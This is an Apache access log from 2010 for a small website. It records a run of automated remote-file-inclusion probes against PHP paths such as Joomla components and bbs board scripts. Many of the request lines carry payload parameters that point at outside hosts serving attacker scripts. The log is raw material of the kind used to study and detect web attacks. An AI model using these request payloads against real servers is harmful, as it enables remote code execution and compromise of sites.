193.47.80.43 - - [06/Feb/2010:10:06:27 -0800] "GET / HTTP/1.1" 200 924 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:09:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:09:24 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:09:27 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:14:19 -0800] "GET //vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:14:19 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:14:24 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:10:15:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:10:15:21 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:10:15:21 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:21:28 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:21:28 -0800] "GET //vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:21:28 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:10:24:01 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:24:09 -0800] "GET //vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:24:09 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:10:24:13 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:35:31 -0800] "GET /logs/access.log%20%20//board//bbs/delete_all.php///delete_all.php?board_skin_path=http://www.fileden.com/files/2010/2/6/2751992/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:35:31 -0800] "GET /logs//board//bbs/delete_all.php///delete_all.php?board_skin_path=http://www.fileden.com/files/2010/2/6/2751992/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:35:31 -0800] "GET /board//bbs/delete_all.php///delete_all.php?board_skin_path=http://www.fileden.com/files/2010/2/6/2751992/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
174.121.45.220 - - [06/Feb/2010:10:41:08 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
174.121.45.220 - - [06/Feb/2010:10:41:08 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
174.121.45.220 - - [06/Feb/2010:10:41:09 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:09:16 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:09:16 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:09:16 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:11:10:10 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:11:10:10 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:11:10:10 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:13:16 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:13:16 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:13:16 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:13:17 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:13:17 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:11:13:17 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:11:13:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:11:13:51 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:11:13:51 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:11:17:34 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:11:17:34 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:11:17:34 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:11:29:30 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:11:29:30 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:11:29:30 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:11:33:45 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:11:33:45 -0800] "GET /include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:11:33:45 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:11:34:29 -0800] "GET /logs/access.log%20%20/?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:11:34:29 -0800] "GET /logs/?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:11:34:29 -0800] "GET /?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:11:35:28 -0800] "GET /logs/?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:11:35:28 -0800] "GET /logs/access.log%20%20/?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:11:35:28 -0800] "GET /?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
64.15.158.246 - - [06/Feb/2010:11:39:11 -0800] "GET /delete_all.php?board_skin_path=http://www.townsendcountry.com/scrapchat/chat/localization/greek/chid.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "allattitudedoxies.com"
64.15.158.246 - - [06/Feb/2010:11:39:11 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.townsendcountry.com/scrapchat/chat/localization/greek/chid.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "allattitudedoxies.com"
64.15.158.246 - - [06/Feb/2010:11:39:11 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.townsendcountry.com/scrapchat/chat/localization/greek/chid.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:11:39:17 -0800] "GET /delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:11:39:17 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:11:39:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:11:40:48 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:11:40:48 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:11:40:48 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.226.134.29 - - [06/Feb/2010:11:52:35 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "allattitudedoxies.com"
200.226.134.29 - - [06/Feb/2010:11:52:36 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "allattitudedoxies.com"
200.226.134.29 - - [06/Feb/2010:11:52:36 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "allattitudedoxies.com"
80.67.28.149 - - [06/Feb/2010:11:52:41 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_contehttp://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
80.67.28.149 - - [06/Feb/2010:11:52:41 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_contehttp://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
80.67.28.149 - - [06/Feb/2010:11:52:41 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_contehttp://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:11:56:18 -0800] "GET /delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:11:56:18 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:11:56:19 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:11:59:47 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:11:59:47 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:11:59:47 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
64.15.158.246 - - [06/Feb/2010:12:08:21 -0800] "GET /delete_all.php?board_skin_path=http://www.townsendcountry.com/scrapchat/chat/localization/greek/chid.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "allattitudedoxies.com"
64.15.158.246 - - [06/Feb/2010:12:08:21 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.townsendcountry.com/scrapchat/chat/localization/greek/chid.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "allattitudedoxies.com"
64.15.158.246 - - [06/Feb/2010:12:08:21 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.townsendcountry.com/scrapchat/chat/localization/greek/chid.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:12:09:31 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:12:09:31 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
188.138.32.230 - - [06/Feb/2010:12:09:31 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:10:28 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:10:28 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:10:31 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:12:10 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:12:10 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:12:10 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
221.139.0.75 - - [06/Feb/2010:12:26:59 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
221.139.0.75 - - [06/Feb/2010:12:26:59 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
221.139.0.75 - - [06/Feb/2010:12:26:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.187.110.80 - - [06/Feb/2010:12:31:13 -0800] "GET /logs//calendar/tools/send_reminders.php?noSet=0&includedir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.187.110.80 - - [06/Feb/2010:12:31:13 -0800] "GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.187.110.80 - - [06/Feb/2010:12:31:13 -0800] "GET /logs/access.log%20%20//calendar/tools/send_reminders.php?noSet=0&includedir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.187.110.80 - - [06/Feb/2010:12:31:21 -0800] "GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.187.110.80 - - [06/Feb/2010:12:31:21 -0800] "GET /logs/access.log%20%20//calendar/tools/send_reminders.php?noSet=0&includedir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.187.110.80 - - [06/Feb/2010:12:31:21 -0800] "GET /logs//calendar/tools/send_reminders.php?noSet=0&includedir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
190.97.219.4 - - [06/Feb/2010:12:32:29 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
190.97.219.4 - - [06/Feb/2010:12:32:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
190.97.219.4 - - [06/Feb/2010:12:32:29 -0800] "GET /delete_all.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:35:15 -0800] "GET /config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:35:20 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:35:20 -0800] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:35:32 -0800] "GET /config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:35:32 -0800] "GET /logs/access_091002.log//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:35:34 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:35:34 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:12:35:34 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:35:35 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:12:35:42 -0800] "GET /logs/access_091002.log//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:12:35:42 -0800] "GET /config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:12:35:42 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:12:36:19 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:12:36:19 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:12:36:19 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:39:48 -0800] "GET /config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:39:48 -0800] "GET /logs/access_091002.log%20%20//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:12:39:48 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
